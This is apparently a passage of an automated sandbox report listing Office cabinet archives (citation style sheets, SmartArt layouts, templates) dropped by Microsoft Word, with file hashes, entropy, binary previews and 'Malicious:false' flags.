                                                                                                                                                                                                                                                                Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):31605
                                                                                                                                                                                                                                                                Entropy (8bit):7.820497014278096
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                                                                                                                                                                                                                                MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                                                                                                                                                                                                                                SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                                                                                                                                                                                                                                SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                                                                                                                                                                                                                                SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):32833
                                                                                                                                                                                                                                                                Entropy (8bit):7.825460303519308
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                                                                                                                                                                                                                                MD5:205AF51604EF96EF1E8E60212541F742
                                                                                                                                                                                                                                                                SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                                                                                                                                                                                                                                SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                                                                                                                                                                                                                                SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20235
                                                                                                                                                                                                                                                                Entropy (8bit):7.61176626859621
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                                                                                                                                                                                                                                MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                                                                                                                                                                                                                                SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                                                                                                                                                                                                                                SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                                                                                                                                                                                                                                SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):35519
                                                                                                                                                                                                                                                                Entropy (8bit):7.846686335981972
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                                                                                                                                                                                                                                MD5:53EE9DA49D0B84357038ECF376838D2E
                                                                                                                                                                                                                                                                SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                                                                                                                                                                                                                                SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                                                                                                                                                                                                                                SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):22008
                                                                                                                                                                                                                                                                Entropy (8bit):7.662386258803613
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                                                                                                                                                                                                                                MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                                                                                                                                                                                                                                SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                                                                                                                                                                                                                                SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                                                                                                                                                                                                                                SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):31083
                                                                                                                                                                                                                                                                Entropy (8bit):7.814202819173796
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                                                                                                                                                                                                                                MD5:89A9818E6658D73A73B642522FF8701F
                                                                                                                                                                                                                                                                SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                                                                                                                                                                                                                                SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                                                                                                                                                                                                                                SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):26944
                                                                                                                                                                                                                                                                Entropy (8bit):7.7574645319832225
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                                                                                                                                                                                                                                MD5:F913DD84915753042D856CEC4E5DABA5
                                                                                                                                                                                                                                                                SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                                                                                                                                                                                                                                SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                                                                                                                                                                                                                                SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43653
                                                                                                                                                                                                                                                                Entropy (8bit):7.899157106666598
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                                                                                                                                                                                                                                MD5:DA3380458170E60CBEA72602FDD0D955
                                                                                                                                                                                                                                                                SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                                                                                                                                                                                                                                SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                                                                                                                                                                                                                                SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):31562
                                                                                                                                                                                                                                                                Entropy (8bit):7.81640835713744
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                                                                                                                                                                                                                                MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                                                                                                                                                                                                                                SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                                                                                                                                                                                                                                SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                                                                                                                                                                                                                                SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):46413
                                                                                                                                                                                                                                                                Entropy (8bit):7.9071408623961394
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                                                                                                                                                                                                                                MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                                                                                                                                                                                                                                SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                                                                                                                                                                                                                                SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                                                                                                                                                                                                                                SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):23597
                                                                                                                                                                                                                                                                Entropy (8bit):7.692965575678876
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                                                                                                                                                                                                                                MD5:7C645EC505982FE529D0E5035B378FFC
                                                                                                                                                                                                                                                                SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                                                                                                                                                                                                                                SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                                                                                                                                                                                                                                SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):30957
                                                                                                                                                                                                                                                                Entropy (8bit):7.808231503692675
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                                                                                                                                                                                                                                MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                                                                                                                                                                                                                                SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
